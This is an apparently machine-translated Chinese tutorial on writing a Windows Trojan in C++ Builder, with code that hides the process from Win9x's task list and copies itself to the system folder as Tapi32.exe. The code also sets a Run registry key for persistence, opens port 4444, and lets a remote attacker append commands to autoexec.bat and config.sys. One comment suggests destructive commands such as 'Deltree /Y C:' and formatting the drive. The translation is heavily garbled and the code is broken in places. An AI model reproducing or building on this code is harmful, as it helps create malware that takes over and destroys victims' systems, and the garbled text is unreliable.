Truche, the noun, everyone should be unfamiliar, since the "Dead Bull Worship" hacker group announced the BACK ORIFICE, the Trojan is so flat, making China netizens growing up in the DOS - Windows era from the colorful network The dream woke up, and finally I realized the network also had evil side, and I was in a time.
I saw an article at the "Computer Daily", mostly a rookie was controlled by the BO, scared all day, I can't eat, I can't sleep, I can't help it! Oh, you have to know that Trojan's history is a long time: As early as AT & T UNIX and BSD UNIX, Trojan is a very high-level young man (mainly old). ) Written in C or Shell language, basically used to steal the password of the landing host to achieve higher permissions. At that time, the main method of Trojans was to trick - first modify your .profile file, implant the Trojan; when you log in, save your password characters into a file, and send it to the attacker's mailbox. Domestic young people are growing up in pirated DOS, which can be said to be very strange to the network. Until Win9x is born, especially the popularity of WinNT, the development of the network cause, BO This is a bit simple and even saying that it is a simple Trojan (even in Win9x "closing procedure. The dialog can see the process) gave the Chinese people very shocking, and it can be said to be an epoch-making software in China's network security.
Write the Trojan yourself, is it COOL? ! Trojans must be composed of two parts-server program (Server) and client programs (client), the server is responsible for opening an attack, just like a rape special; client is responsible for attacking the target, both require a certain network protocol to do Communication (typically TCP / IP protocol). In order to make everyone better understand the mystery of Tumao, break away the mystery of Trojans, I will talk about the technology of writing Trojans and write an example Trojan, making everyone better guarding and killing various known and known. Unknown Trojan.
The first is the selection of programming tools. At present, the popular development tools have C Builder, VC, VB and Delphi. Here we use C Builder (hereinafter referred to as BCB); VC is good, but the GUI design is too complicated, in order to better highlight my example, concentrate Attention to the basic principles of Trojans, we use visualized BCB; Delphi is also good, but the defect cannot inherit the existing resources (such as "Death Bull Worship" hacker group published BO2000 source code, is written online, online I will pick up it); VB, I don't talk about it - do you also pass the victim a more than 1 trigulent dynamic link library - MSVBVM60.DLL?
Start C Builder 5.0 Enterprise Edition, create a new project, add three VCL controls: one is the Server Socket in the Internet page, and the other is NMFTP and NMSMTP in the FastNet page. The function of Server Socket is used to make this program into a server program, which can be served (open the attacker). Socket was originally appeared on UNIX. Later, Microsoft introduced it into Windows (including Win98 and WINNT); the role of the two controls is to make the program with FTP (File Transfer Protocol File Transfer Protocol) and SMTP (Simple Mail) TRANSFER Protocol Simple Mail Transfer Protocol The function, you know that you know that the software has controls for uploading downloads and email features. The Form form is visible, which is of course incredible. Not light, there is a lot of space (there is 300K a Form), and the software is visible, there is no role. So actually writing Trojans, you can use some techniques to make the program do not include FORM, just like the apparatus implemented by the Delphi process is only about 17k.
We should first let our procedures can be stealth. Double-click Form, first add the code that hides the Trojate in the Win9x "Close Program" dialog box in the FormCreate event. This looks mysterious. In fact, it is just a background process called Service, which can be run under a higher priority, which can be said to be the one in the device driver that is very close to the system. Therefore, as long as our program is registered into a service process in the process database (), the service process is available. However, this function is not in the header file of Borland's pre-packaged header, then we have to declare this bird function in kernel32.dll. First determine the operating system of the target machine is Win9X or WinNT:
{
DWORD dWVersion = getVersion ();
// Get the version number of the operating system
IF (dwversion> = 0x80000000)
// The operating system is Win9x, not Winnt
{
Typedf DWORD (Callback * LpregisterServiceProcess) (DWORD, DWORD);
File: // Type / Righted RegisterServiceProcess () Prototype
Hinstance HDLL;
LPREGISTERSERVICEPROCESS LPREGISTERSERVICEPROCESS;
HDLL = LoadLibrary ("kernel32");
File: // Plus / load the dynamic link library kernel32.dll in the registerServiceProcess () function
LpregisterServiceProcess = (lpregisterServiceProcess) GetProcaddress (HDLL, "RegisterServiceProcess");
File: // Get / to the address of the registerServiceProcess () function
LPREGISTERSERVICEPROCESS (), 1);
File: // Explore / row registerServiceProcess () function, hide this process
Freelibrary (HDLL);
File: // Unload / carry the dynamic link library
}
}
This will finally stealth (harm me, so many code!). Why judge the operating system? Because the process manager in WinNT can be unbelful to the current process, there is no need to use the above code under WinNT (but you can use other methods, this is left later). Then copy yourself to the% system% directory, for example: c: / windows / system, and modify the registry to automatically load when starting:
{
CHAR TEMPPATH [MAX_PATH];
File: // Type / a variable
GetSystemDirectory (Temppath, Max_Path);
File: // Temppath / is the address of the System directory buffer, MAX_PATH is the size of the buffer, get the SYSTEM directory path of the target machine.
SystemPath = Ansistring (Temppath);
FILE: // style / typed Temppath string so that it is a style that can be used by the compiler.
Copyfile (paramstr (0) .c_str (), AnsiString (SystemPath "// Tapi32.exe"). C_str (), false;
File: // copy / copy it to the% system% directory and renamed Tapi32.exe, camouflage
Registry = new Tregistry;
File: // Type / Yi A Tregistry object, ready to modify the registry, this step is essential
Registry-> rootkey = HKEY_LOCAL_MACHINE
File: // Set / set the master button for hkey_local_machine
Registry-> OpenKey ("Software // Microsoft // Windows // CurrentVersion // Run", TRUE);
File: // Type / KBROFT // Windows // CurrentVersion // Run, if there is no existence, create it
Try
{
File: // If the following statement is abnormal, jump to catch to avoid the crash
if (Registry-> ReadString ("Crossbow")! = SystemPath "// Tapi32.exe")
Registry-> WriteString ("Crossbow", SystemPath "// Tapi32.exe");
File: // Check / find the key value of "crossbow", and whether it is a copy of the directory% system% TAPI32.EXE
File: // If / fruit is not, write the above key value and content
}
Catch (...)
{
File: // If there is a mistake, nothing
}
}
Ok, the FormCreate process is complete, so each startup can automatically load Tapi32.exe, and you can't see this process in the Close Programs dialog box, the Trojan's prototype.
Then select the Serversocket control, change the Active to TRUE in the Object Inspector on the left, so that the program opens a specific port to operate in the server. The port is filled in 4444, which is the port number of the Trojan, of course, you can use other. But you have to pay attention not to use a low-end port of 1024 below, because this may not only conflict with the ports used by the basic network protocol, but it is easy to find, so try to use a high-end port of 1024 or more (but there is also a technology. It deliberately uses specific ports, because if conflicts cause, Windows will not report an error ^ _ ^). You can take a look at the port used by the TNMFTP control, which is a port of the FTP protocol (FTP Control Port); the secondary port of TNMSMTP is also a dedicated port of the SMTP protocol. Select the serversocket control, click on the Events page, double-click the onclientread event, and type the following code:
{
File * fp = null;
CHAR * Content;
INT TIMES_OF_TRY;
Char Tempfile [MAX_PATH];
File: // Type / righteously use the variable to be used later
Sprintf (TempFile, "% S", ANSISTISTRING (SystemPath Ansistring ("// Win369.bat")). C_STR ());
File: // Under% system% / create a text file win369.bat, use it as a temporary file
Ansistring Temp = Socket-> ReceiveText ();
File: // Receive the data from the client (attacker, that is, yourself)
}
Ok, the door is open! Then it is to modify the various configurations of the target machine! ^ _ ^ Let's modify autoexec.bat and config.sys:
{
IF (Temp.Substring (0,9) == "Edit conf")
FILE: // If the result of the string of the string is "Edit Conf"
{
INT number = TEMP.LENGTH ();
FILE: // Get / to the length of the string
INT file_name = atoi ((Temp.Substring (11, 1)). c_str ());
File: // Convert / 11 characters to Integer type, deposit file_name variable
FILE: / / For / what is the 11th character, because the 10 characters are space characters
CONTENT = (Temp.Substring (12, Number-11) '/ n'). c_str ();
File: // over / down strings will be written to the target file as the content written
File * fp = null;
Char filename [20];
Chmod ("c: //autoexec.bat", s_iread | s_iwrite);
CHMOD ("c: //config.sys", s_iread | s_iwrite);
File: // Replace the property of / two target files to readable
IF (file_name == 1)
Sprintf (filename, "% s", "c: //autoexec.bat");
File: // If the 11th character is 1, it is formatted by Autoexec.Bat.
ELSE IF (file_name == 2)
Sprintf (filename, "% s", "c: ///config.sys"); file: // If the 11 characters are 1, it is formatted with config.sys.
Times_of_TRY = 0;
File: // Type /
While (fp == NULL)
{
File: // If the pointer is empty
FP = fopen (filename, "a ");
File: // If the file does not exist, create it; if it exists, ready to add it later
File: // If / is wrong, the file pointer is empty, so it will be repeated
Times_of_try = Times_OF_TRY 1;
File: / / Meter / Numeral plus 1
IF (TIMES_OF_TRY> 100)
{
File: // If / fruit has been tried to be 100 times, it is still not successful
Socket-> Sendtext ("Fail by Open File");
File: // On / Send back the error message "fail by open file"
Goto end;
File: // Jump / to END
}
}
FWRITE (Content, Sizeof (Char), Strlen (Content), FP);
File: // Write / Add the statement, such as Deltree / Y C: or Format / Q / Autotest C:, is enough? !
Fclose (fp);
File: // Write / complete the target file
Socket-> SendText ("Sucess");
File: / / Send back "Success" successful information
}
}
You can now view the two files on the target through the network, and you can add any commands to the inside. Oh, this is just a cow knife. Friends, don't walk away! (Endlessly)
This article is reproduced from China Software (http://www.9cbs.net).
